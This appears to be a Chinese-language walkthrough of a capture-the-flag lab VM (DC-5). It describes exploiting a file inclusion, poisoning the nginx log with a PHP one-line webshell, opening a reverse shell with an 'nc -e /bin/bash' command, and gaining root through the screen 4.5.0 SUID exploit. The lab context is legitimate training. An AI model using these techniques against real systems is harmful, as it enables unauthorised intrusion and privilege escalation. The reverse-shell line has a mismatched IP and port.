下载环境导入靶机，在kali里面扫描靶机ip地址靶机IP：192.168.190.133

扫描端口：开放了两个tcp端口，我们访问一下ip在下载靶机的时候说明了只有一个flag，我们在页面试试，发现contact页面评论后会出现thankyou.php而且每次刷新下方的显示不同，扫描一下后台访问footer.php同样是每次刷新后内容不同，那猜测下方的年份显示可能是调用文件后返回的数值，尝试一下文件包含，发现成功文件包含因为靶机服务扫描时发现靶机网站使用的是nginx服务器，我们知道nginx服务器的默认配置文件是/etc/nginx/nginx.conf，所以将nginx的配置文件包含过来查看日志路径，发现了nginx的日志路径: access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log;向日志文件传输一句话木马让其进行解析，使用burpsuite抓包改包向日志文件传入一句话木马使用蚁剑连接使用虚拟终端反弹shell，蚁剑虚拟终端输入nc -e  /bin/bash 192.168.190.133(kali ip地址) 777，kali监听7777 端口

切换shell外壳

python -c 'import pty;pty.spawn("/bin/bash")'

然后进行提权，使用命令find / -user root -perm -4000 -print 2>/dev/null，查看是否有可利用的suid

这里不知道哪个有用就看了大佬们的wp，发现screen-4.5.0有漏洞可以利用，使用命令：searchsploit screen 4.5.0将文件cp出来41154.sh：查看文件可以知道，脚本文件需要分3个步骤完成
第一步：将第一部分diam写入libhax.c文件中，在执行相应的命令生成libhax.so文件第二步：将第二部分的C语言代码写入rootshell文件中，并编译成rooshell文件第三步：将剩下部分的脚本代码写入到dc5.sh文件中，在开头加上#!/bin/bash注明执行环境，保存需要输入为set ff=unix，是为了防止脚本的格式错误查看dc5.sh文件并加上可执行权限将生成的三个文件通过蚁剑上传到根目录下的/tmp/下然后在反弹shell中使用命令执行dc5.sh文件，命令chmod +x dc5.sh增加可执行权限，执行文件查看权限：切换到/root下拿到flag：